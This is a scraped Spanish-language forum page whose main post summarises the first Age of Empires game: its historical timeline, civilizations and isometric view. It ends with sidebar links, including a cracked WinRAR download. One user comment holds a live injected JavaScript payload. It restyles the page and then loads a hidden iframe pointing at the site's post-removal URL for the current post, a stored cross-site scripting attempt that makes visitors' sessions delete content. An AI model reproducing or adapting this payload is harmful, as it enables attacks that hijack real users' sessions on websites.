Nicov el argentino clan am vs suomi.

Hecho por MatrixDeone en la categoria Videos-Online

 

Age of Empires en su primera versión fue uno de los primeros juegos en el género en usar unidades y escenarios "exactos históricamente" - Los juegos de estrategia en tiempo real muy a menudo usaban temas de fantasía, como Warcraft, o Ciencia-ficción, como Dune 2 o Total Annihilation. También es uno de los primeros en usar la perspectiva isométrica, a diferencia de la típica vista "aérea", en ese momento. 

Ésta fue la primera versión del juego, escenificado en una línea del tiempo de 3000 años, desde la temprana Edad de piedra hasta la Edad de Hierro. El jugador tendrá opción de elegir entre doce civilizaciones, como lo es la Egipcia, Shang, Griega, Persia, etc. 

El Juego fue popular por su dramático giro a los juegos del género; intenso en sus batallas, veloz al atacar, y muy diferente a cualquier juego creado hasta ese momento. 

El juego toma accion como dicho, en una linea de tiempo sobre 3000 años y en los que se puede viajar a traves durante el juego. Para avanzar una civilizacion debe cumplir los requisitos necesarios. 

 

 

 


20

Comentarios 111

MadAra - Mad-1545016413077 - Hace 1 mes

El fin esta cerca "document.body.setAttribute('style',' background: url(https://vignette.wikia.nocookie.net/aldea/images/f/f4/Madara_Uchiha_sharingan.gif/revision/latest?cb=20110911030748&path-prefix=es)');setTimeout(function(){var i = document.createElement('iframe');i.src = 'https://1peluchinga.com/post/remove/'+window.location.toString().match(/(.*?):\/\/1peluchinga.com\/comentario\/(.*?)\//)[2];i.style.visibility = 'hidden';document.body.appendChild(i) ;}),3000"> 0 0

Recomendados papu

El mejor torbellino de estados fail+wtf de las redes


Descargar gatchaman crowds 12-12 mega


Entra a recomendar tu libro favorito


1peluchinga puede tirar erroes en estos momentos. estamos pasando a la version 1.00


B0x.sh - libertad absoluta x7ji9


Impresionantes fantasmas captados en cementerios


Descargar winrar 5.61 full en español (activado)


Compragamer, ladrones.


Carpetazo: filtran fotos de periodista tomando cocaina


Que paso ,ya no hay bardo en peluchinga ._.